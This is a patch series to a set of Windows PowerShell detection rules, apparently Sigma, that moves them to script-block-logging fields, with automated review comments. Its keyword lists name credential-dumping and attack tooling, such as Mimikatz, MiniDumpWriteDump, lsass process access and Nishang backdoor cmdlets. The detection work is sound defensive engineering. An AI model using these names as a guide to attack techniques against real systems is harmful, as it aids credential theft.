@@ -10,33 +10,36 @@ tags: - attack.t1086 #an old one author: Sean Metcalf (source), Florian Roth (rule) date: 2017/03/05 +modified: 2021/08/21 logsource: product: windows service: powershell definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' detection: - keywords: - - "AdjustTokenPrivileges" - - "IMAGE_NT_OPTIONAL_HDR64_MAGIC" - - "Microsoft.Win32.UnsafeNativeMethods" - - "ReadProcessMemory.Invoke" - - "SE_PRIVILEGE_ENABLED" - - "LSA_UNICODE_STRING" - - "MiniDumpWriteDump" - - "PAGE_EXECUTE_READ" - - "SECURITY_DELEGATION" - - "TOKEN_ADJUST_PRIVILEGES" - - "TOKEN_ALL_ACCESS" - - "TOKEN_ASSIGN_PRIMARY" - - "TOKEN_DUPLICATE" - - "TOKEN_ELEVATION" - - "TOKEN_IMPERSONATE" - - "TOKEN_INFORMATION_CLASS" - - "TOKEN_PRIVILEGES" - - "TOKEN_QUERY" - - "Metasploit" - - "Mimikatz" - condition: keywords + Malicious: + EventID: 4104 + ScriptBlockText|contains: + - "AdjustTokenPrivileges" + - "IMAGE_NT_OPTIONAL_HDR64_MAGIC" + - "Microsoft.Win32.UnsafeNativeMethods" + - "ReadProcessMemory.Invoke" + - "SE_PRIVILEGE_ENABLED" + - "LSA_UNICODE_STRING" + - "MiniDumpWriteDump" + - "PAGE_EXECUTE_READ" + - "SECURITY_DELEGATION" + - "TOKEN_ADJUST_PRIVILEGES" + - "TOKEN_ALL_ACCESS" + - "TOKEN_ASSIGN_PRIMARY" + - "TOKEN_DUPLICATE" + - "TOKEN_ELEVATION" + - "TOKEN_IMPERSONATE" + - "TOKEN_INFORMATION_CLASS" + - "TOKEN_PRIVILEGES" + - "TOKEN_QUERY" + - "Metasploit" + - "Mimikatz" + condition: Malicious falsepositives: - Penetration tests level: high diff --git a/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml b/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml index e8a9ef6c..90b3e7a7 100644 --- a/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml 
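Review bot: The `definition` line still reads "It is recommended to use the new Script Block Logging…", but the rewritten selection now hard-requires `EventID: 4104` with `ScriptBlockText`, so script block logging is no longer a recommendation; change it to `definition: Script block logging must be enabled` as the sibling rules in this series do. Note also that the old free-text `keywords` form could match any PowerShell event carrying those strings (4103 `Payload` included, as far as the free-text backends go), whereas the new form is 4104-only — if that narrowing is intended it is worth a sentence in the description.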
@@ -3,7 +3,7 @@ id: f772cee9-b7c2-4cb2-8f07-49870adc02e0 status: experimental description: Detects Commandlet names and arguments from the Nishang exploitation framework date: 2019/05/16 -modified: 2021/07/21 +modified: 2021/08/21 references: - https://github.com/samratashok/nishang tags: @@ -14,10 +14,11 @@ author: Alec Costello logsource: product: windows service: powershell - definition: It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277 + definition: Script block logging must be enabled detection: - keywords: - Payload|contains: + Nishang: + EventID: 4104 + ScriptBlockText|contains: - Add-ConstrainedDelegationBackdoor - Set-DCShadowPermissions - DNS_TXT_Pwnage @@ -89,7 +90,7 @@ detection: - NotAllNameSpaces - exfill - FakeDC - condition: keywords + condition: Nishang falsepositives: - Penetration testing level: high From 6c529f7ab27c9574da2d5a50dc661714e4d03a00 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 21 Aug 2021 09:33:52 +0200 Subject: [PATCH 0482/1367] Update PS rules --- .../powershell_clear_powershell_history.yml | 2 +- .../powershell/powershell_ntfs_ads_access.yml | 20 +++++++++++-------- .../powershell/powershell_powercat.yml | 1 + ...rshell_powerview_malicious_commandlets.yml | 6 +++--- .../powershell_prompt_credentials.yml | 7 +++---- .../powershell/powershell_psattack.yml | 8 ++++---- .../powershell_remote_powershell_session.yml | 1 + .../powershell/powershell_shellcode_b64.yml | 2 +- ...shell_shellintel_malicious_commandlets.yml | 5 +++-- 9 files changed, 29 insertions(+), 23 deletions(-) diff --git a/rules/windows/powershell/powershell_clear_powershell_history.yml b/rules/windows/powershell/powershell_clear_powershell_history.yml index e937037d..ff01b153 100644 --- a/rules/windows/powershell/powershell_clear_powershell_history.yml +++ b/rules/windows/powershell/powershell_clear_powershell_history.yml 
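Review bot: Changing the field from `Payload|contains` to `ScriptBlockText|contains` and pinning `EventID: 4104` moves this rule's coverage from module-logging events (where `Payload` carries the invoked command-let text, if I read the 4103 schema correctly) to script-block events, rather than extending it. If both sources are wanted, keep a second selection with `EventID: 4103` and `Payload|contains:` over the same list and use `condition: 1 of them`; otherwise the description should say the rule relies on script block logging only. The command-let list continues outside the hunk.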
@@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: 4104 Script block logging must be enabled , 4103 Module Logging must be enabled detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_ntfs_ads_access.yml b/rules/windows/powershell/powershell_ntfs_ads_access.yml index 9ee13a9f..0d38b0d7 100644 --- a/rules/windows/powershell/powershell_ntfs_ads_access.yml +++ b/rules/windows/powershell/powershell_ntfs_ads_access.yml @@ -13,18 +13,22 @@ tags: - attack.t1086 # an old one author: Sami Ruohonen date: 2018/07/24 -modified: 2020/08/24 +modified: 2021/08/21 logsource: product: windows service: powershell - definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' + definition: Script block logging must be enabled detection: - keyword1: - - "set-content" - - "add-content" - keyword2: - - "-stream" - condition: keyword1 and keyword2 + event: + EventID: 4104 + content: + ScriptBlockText|contains: + - "set-content" + - "add-content" + stream: + ScriptBlockText|contains: + - "-stream" + condition: all of them falsepositives: - unknown level: high diff --git a/rules/windows/powershell/powershell_powercat.yml b/rules/windows/powershell/powershell_powercat.yml index 553a8059..c4c5cb0c 100644 --- a/rules/windows/powershell/powershell_powercat.yml +++ b/rules/windows/powershell/powershell_powercat.yml @@ -31,6 +31,7 @@ detection: logsource: product: windows service: powershell + definition: Module Logging must be enable detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_powerview_malicious_commandlets.yml b/rules/windows/powershell/powershell_powerview_malicious_commandlets.yml index b98fbb4c..1b2b7454 100644 --- a/rules/windows/powershell/powershell_powerview_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_powerview_malicious_commandlets.yml 
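Review bot: The new `definition: Module Logging must be enable` in powercat is ungrammatical and the same "must be enable" wording recurs in the powerview, remote-session and shellintel rules of this commit; use `definition: Module Logging must be enabled` throughout. In the same spirit, clear_powershell_history's `definition: 4104 Script block logging must be enabled , 4103 Module Logging must be enabled` would read better as `definition: Script block logging must be enabled for 4104, module logging for 4103`. The ntfs_ads_access rewrite into three AND-ed selections (`event`, `content`, `stream`) is fine, but the `-stream` substring is matched anywhere in the block, so a one-line comment noting that the cmdlet match is what scopes it would help the next reader.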
@@ -3,7 +3,7 @@ id: dcd74b95-3f36-4ed9-9598-0490951643aa status: experimental description: Detects Commandlet names from PowerView of PowerSploit exploitation framework. date: 2021/05/18 -modified: 2021/07/02 +modified: 2021/08/21 references: - https://powersploit.readthedocs.io/en/stable/Recon/README - https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon @@ -16,11 +16,11 @@ author: Bhabesh Raj logsource: product: windows service: powershell - definition: It is recommended to use the new "Script Block Logging" of PowerShell v5. + definition: Script Block Logging must be enable detection: selection: EventID: 4104 - ScriptBlockText: + ScriptBlockText|contains: - Export-PowerViewCSV - Get-IPAddress - Resolve-IPAddress diff --git a/rules/windows/powershell/powershell_prompt_credentials.yml b/rules/windows/powershell/powershell_prompt_credentials.yml index 8ef73b44..b3d5e713 100644 --- a/rules/windows/powershell/powershell_prompt_credentials.yml +++ b/rules/windows/powershell/powershell_prompt_credentials.yml @@ -16,13 +16,12 @@ modified: 2021/08/04 logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 - keyword: ScriptBlockText|contains: 'PromptForCredential' - condition: all of them -falsepositives: + condition: selection +falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_psattack.yml b/rules/windows/powershell/powershell_psattack.yml index 0b3d4167..78690987 100644 --- a/rules/windows/powershell/powershell_psattack.yml +++ b/rules/windows/powershell/powershell_psattack.yml 
@@ -10,15 +10,15 @@ tags: - attack.t1086 #an old one author: Sean Metcalf (source), Florian Roth (rule) date: 2017/03/05 +modified: 2021/08/21 logsource: product: windows service: powershell - definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' + definition: Script block logging must be enabled detection: selection: - EventID: 4103 - keyword: - - 'PS ATTACK!!!' + EventID: 4104 + ScriptBlockText|contains: 'PS ATTACK!!!' condition: all of them falsepositives: - Pentesters diff --git a/rules/windows/powershell/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_remote_powershell_session.yml index 3e345947..237c546b 100644 --- a/rules/windows/powershell/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_remote_powershell_session.yml @@ -22,6 +22,7 @@ level: high logsource: product: windows service: powershell + definition: Module Logging must be enable and fields have to be extract from event detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_shellcode_b64.yml b/rules/windows/powershell/powershell_shellcode_b64.yml index ba269aca..45ea2909 100644 --- a/rules/windows/powershell/powershell_shellcode_b64.yml +++ b/rules/windows/powershell/powershell_shellcode_b64.yml @@ -17,7 +17,7 @@ modified: 2020/12/01 logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml b/rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml index e65c3c23..62dfb25f 100644 --- a/rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml 
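Review bot: After the rewrite `selection` is the only detection item in psattack, so `condition: all of them` is misleading and any helper selection added later would silently be AND-ed into the match; use `condition: selection`. The switch from `EventID: 4103` to `4104` also changes which log source the rule depends on — the updated `definition` covers that, but the `modified` date bump is the only other signal, so a short note in `description` that the rule now keys on script block text would help operators re-checking their logging policy.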
@@ -3,6 +3,7 @@ id: 402e1e1d-ad59-47b6-bf80-1ee44985b3a7 status: experimental description: Detects Commandlet names from ShellIntel exploitation scripts. date: 2021/08/09 +modified: 2021/08/21 references: - https://github.com/Shellntel/scripts/ tags: @@ -12,11 +13,11 @@ author: Max Altgelt, Tobias Michalski logsource: product: windows service: powershell - definition: It is recommended to use the new "Script Block Logging" of PowerShell v5. + definition: Script Block Logging must be enable detection: selection: EventID: 4104 - ScriptBlockText: + ScriptBlockText|contains: - Invoke-SMBAutoBrute - Invoke-GPOLinks - Out-Minidump From da839775fe800c41fed9eea420b290a142368675 Mon Sep 17 00:00:00 2001 
From: frack113 Date: Sat, 21 Aug 2021 09:50:59 +0200 Subject: [PATCH 0483/1367] Update PS rules --- .../sysmon_suspicious_powershell_profile_create.yml} | 0 .../powershell/powershell_CL_Invocation_LOLScript.yml | 2 +- .../powershell/powershell_CL_Invocation_LOLScript_v2.yml | 2 +- .../powershell/powershell_CL_Mutexverifiers_LOLScript.yml | 2 +- rules/windows/powershell/powershell_accessing_win_api.yml | 2 +- rules/windows/powershell/powershell_adrecon_execution.yml | 2 +- .../windows/powershell/powershell_automated_collection.yml | 2 +- rules/windows/powershell/powershell_bad_opsec_artifacts.yml | 2 +- rules/windows/powershell/powershell_decompress_commands.yml | 2 +- rules/windows/powershell/powershell_get_clipboard.yml | 2 +- .../powershell/powershell_invoke_obfuscation_clip+.yml | 2 +- .../powershell_invoke_obfuscation_obfuscated_iex.yml | 2 +- .../powershell/powershell_invoke_obfuscation_stdin+.yml | 2 +- .../powershell/powershell_invoke_obfuscation_var+.yml | 2 +- .../powershell_invoke_obfuscation_via_compress.yml | 2 +- .../powershell/powershell_invoke_obfuscation_via_rundll.yml | 2 +- .../powershell_invoke_obfuscation_via_use_clip.yml | 2 +- .../powershell_invoke_obfuscation_via_use_mhsta.yml | 2 +- .../powershell_invoke_obfuscation_via_use_rundll32.yml | 2 +- .../powershell/powershell_invoke_obfuscation_via_var++.yml | 2 +- .../powershell_suspicious_export_pfxcertificate.yml | 6 +++--- .../powershell/powershell_suspicious_getprocess_lsass.yml | 6 +++--- .../powershell_suspicious_invocation_specific.yml | 1 + rules/windows/powershell/powershell_suspicious_keywords.yml | 2 +- .../windows/powershell/powershell_suspicious_mail_acces.yml | 2 +- .../powershell_suspicious_mounted_share_deletion.yml | 2 +- rules/windows/powershell/powershell_suspicious_recon.yml | 2 +- rules/windows/powershell/powershell_winlogon_helper_dll.yml | 2 +- rules/windows/powershell/powershell_wmimplant.yml | 2 +- 29 files changed, 32 insertions(+), 31 deletions(-) rename 
rules/windows/{powershell/powershell_suspicious_profile_create.yml => file_event/sysmon_suspicious_powershell_profile_create.yml} (100%) diff --git a/rules/windows/powershell/powershell_suspicious_profile_create.yml b/rules/windows/file_event/sysmon_suspicious_powershell_profile_create.yml similarity index 100% rename from rules/windows/powershell/powershell_suspicious_profile_create.yml rename to rules/windows/file_event/sysmon_suspicious_powershell_profile_create.yml diff --git a/rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml b/rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml index 3976c19f..054cd341 100644 --- a/rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml +++ b/rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml b/rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml index 5cd1d3ad..246803a0 100644 --- a/rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml +++ b/rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection2: EventID: 4104 diff --git a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml b/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml index a9e742a2..3430cdd7 100644 --- a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml +++ b/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml 
@@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_accessing_win_api.yml b/rules/windows/powershell/powershell_accessing_win_api.yml index aa74974e..f7ed287e 100644 --- a/rules/windows/powershell/powershell_accessing_win_api.yml +++ b/rules/windows/powershell/powershell_accessing_win_api.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_adrecon_execution.yml b/rules/windows/powershell/powershell_adrecon_execution.yml index f041ac68..af2ba36a 100644 --- a/rules/windows/powershell/powershell_adrecon_execution.yml +++ b/rules/windows/powershell/powershell_adrecon_execution.yml @@ -14,7 +14,7 @@ date: 2021/07/16 logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_automated_collection.yml b/rules/windows/powershell/powershell_automated_collection.yml index d482a22b..d19a88ea 100644 --- a/rules/windows/powershell/powershell_automated_collection.yml +++ b/rules/windows/powershell/powershell_automated_collection.yml @@ -12,7 +12,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection_eventid: EventID: 4104 diff --git a/rules/windows/powershell/powershell_bad_opsec_artifacts.yml b/rules/windows/powershell/powershell_bad_opsec_artifacts.yml index 0479fcd1..98ec3052 100644 --- a/rules/windows/powershell/powershell_bad_opsec_artifacts.yml 
+++ b/rules/windows/powershell/powershell_bad_opsec_artifacts.yml @@ -16,7 +16,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104 , Module Logging must be enable for 4103 detection: selection_4104: EventID: 4104 diff --git a/rules/windows/powershell/powershell_decompress_commands.yml b/rules/windows/powershell/powershell_decompress_commands.yml index bdef59f8..19028f6a 100644 --- a/rules/windows/powershell/powershell_decompress_commands.yml +++ b/rules/windows/powershell/powershell_decompress_commands.yml @@ -13,7 +13,7 @@ references: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_get_clipboard.yml b/rules/windows/powershell/powershell_get_clipboard.yml index 26282f89..542c432c 100644 --- a/rules/windows/powershell/powershell_get_clipboard.yml +++ b/rules/windows/powershell/powershell_get_clipboard.yml @@ -13,7 +13,7 @@ references: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml b/rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml index 8438323a..45c57fa3 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml 
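Review bot: The rewritten `definition` string in this hunk reads `must be enable for 4103` and `4104 ,` with a stray space before the comma, while sibling hunks in the same batch write `enabled for 4103` and `4104,Module` with no space, so the same prerequisite is spelled three different ways across rules. Since `definition` is free text that analysts and tooling grep for, one canonical form such as `definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103` should be applied uniformly. The rule's `detection` section continues past the end of this hunk.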
@@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104 , Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml b/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml index dd5771b8..9b030a97 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml b/rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml index f1969a38..a8b5d343 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_var+.yml b/rules/windows/powershell/powershell_invoke_obfuscation_var+.yml index 61e5ee7e..f8476262 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_var+.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_var+.yml 
@@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104,Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml index 8fde7bb9..165d13d2 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml index e26c5a29..e47cf4f4 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml index 5adbdedc..30749fc4 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml 
@@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml index 07f71af3..ceaab349 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml index cc5e50e6..445355bc 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml index f1d98861..60a0fe2b 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml 
@@ -15,7 +15,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml b/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml index 6a621346..b39cf109 100644 --- a/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml +++ b/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml @@ -14,12 +14,12 @@ modified: 2021/08/04 logsource: product: windows service: powershell - definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' + definition: Script Block Logging must be enable detection: - keywords: + PfxCertificate: EventID: 4104 ScriptBlockText|contains: "Export-PfxCertificate" - condition: keywords + condition: PfxCertificate falsepositives: - Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable) level: high diff --git a/rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml b/rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml index c08f0ca5..eccd3337 100644 --- a/rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml +++ b/rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml 
@@ -13,12 +13,12 @@ modified: 2021/08/04 logsource: product: windows service: powershell - definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' + definition: Script Block Logging must be enable detection: - keywords: + select_LSASS: EventID: 4104 ScriptBlockText|contains: 'Get-Process lsass' - condition: keywords + condition: select_LSASS falsepositives: - Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable) level: high diff --git a/rules/windows/powershell/powershell_suspicious_invocation_specific.yml b/rules/windows/powershell/powershell_suspicious_invocation_specific.yml index 39da524b..7ae574e1 100644 --- a/rules/windows/powershell/powershell_suspicious_invocation_specific.yml +++ b/rules/windows/powershell/powershell_suspicious_invocation_specific.yml @@ -11,6 +11,7 @@ date: 2017/03/05 logsource: product: windows service: powershell + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: convert_b64: - '-nop' diff --git a/rules/windows/powershell/powershell_suspicious_keywords.yml b/rules/windows/powershell/powershell_suspicious_keywords.yml index 991dfc3c..35673048 100644 --- a/rules/windows/powershell/powershell_suspicious_keywords.yml +++ b/rules/windows/powershell/powershell_suspicious_keywords.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277. Monitor for EventID 4104' + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: keywords: - "System.Reflection.Assembly.Load($" diff --git a/rules/windows/powershell/powershell_suspicious_mail_acces.yml b/rules/windows/powershell/powershell_suspicious_mail_acces.yml index 13210d4a..18b6b460 100644 
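Review bot: The `falsepositives` entry left in place below the renamed `select_LSASS` selection still reads `Legitimate certificate exports invoked by administrators or users`, which was copied from the Export-PfxCertificate rule and does not describe a `Get-Process lsass` detection; it should be replaced with something that fits this rule, e.g. `- Administrative troubleshooting scripts that enumerate the lsass process`. The new `definition: Script Block Logging must be enable` also has a typo (`enabled`) and differs from the `Script block logging must be enabled` wording the same batch uses in other rules. Both points are visible in this hunk's context and added lines.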
--- a/rules/windows/powershell/powershell_suspicious_mail_acces.yml +++ b/rules/windows/powershell/powershell_suspicious_mail_acces.yml @@ -12,7 +12,7 @@ tags: logsource: product: windows service: powershell - definition: EnableScriptBlockLogging must be set to enable + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml b/rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml index c040e3a5..941ef606 100644 --- a/rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml +++ b/rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml @@ -12,7 +12,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_suspicious_recon.yml b/rules/windows/powershell/powershell_suspicious_recon.yml index 78368cdf..a46b1d1b 100644 --- a/rules/windows/powershell/powershell_suspicious_recon.yml +++ b/rules/windows/powershell/powershell_suspicious_recon.yml @@ -12,7 +12,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection_eventid: EventID: 4104 diff --git a/rules/windows/powershell/powershell_winlogon_helper_dll.yml b/rules/windows/powershell/powershell_winlogon_helper_dll.yml index 026d8240..d15724be 100644 --- a/rules/windows/powershell/powershell_winlogon_helper_dll.yml +++ b/rules/windows/powershell/powershell_winlogon_helper_dll.yml @@ -10,7 +10,7 @@ references: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 
diff --git a/rules/windows/powershell/powershell_wmimplant.yml b/rules/windows/powershell/powershell_wmimplant.yml index 8ff61cde..ec0915ff 100644 --- a/rules/windows/powershell/powershell_wmimplant.yml +++ b/rules/windows/powershell/powershell_wmimplant.yml @@ -14,7 +14,7 @@ date: 2020/03/26 logsource: product: windows service: powershell - definition: "Script block logging must be enabled" + definition: Script block logging must be enabled detection: selection: ScriptBlockText|contains: From 0fb6c35b1fe80decd09cccdeae23abf24497e222 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 21 Aug 2021 09:58:58 +0200 Subject: [PATCH 0484/1367] Cleanup PS rules --- .../sysmon_powershell_code_injection.yml} | 0 .../powershell_CL_Mutexverifiers_LOLScript_v2.yml | 2 +- .../powershell/powershell_create_local_user.yml | 2 +- .../powershell/powershell_data_compressed.yml | 2 +- .../powershell/powershell_dnscat_execution.yml | 2 +- .../powershell/powershell_icmp_exfiltration.yml | 2 +- .../powershell/powershell_invoke_nightmare.yml | 2 +- .../powershell_invoke_obfuscation_via_stdin.yml | 2 +- .../powershell/powershell_malicious_commandlets.yml | 12 +++++------- .../win_powershell_cmdline_reversed_strings.yml} | 0 .../win_powershell_cmdline_special_characters.yml} | 0 ...win_powershell_cmdline_specific_comb_methods.yml} | 0 12 files changed, 12 insertions(+), 14 deletions(-) rename rules/windows/{powershell/powershell_code_injection.yml => create_remote_thread/sysmon_powershell_code_injection.yml} (100%) rename rules/windows/{powershell/powershell_cmdline_reversed_strings.yml => process_creation/win_powershell_cmdline_reversed_strings.yml} (100%) rename rules/windows/{powershell/powershell_cmdline_special_characters.yml => process_creation/win_powershell_cmdline_special_characters.yml} (100%) rename rules/windows/{powershell/powershell_cmdline_specific_comb_methods.yml => process_creation/win_powershell_cmdline_specific_comb_methods.yml} (100%) 
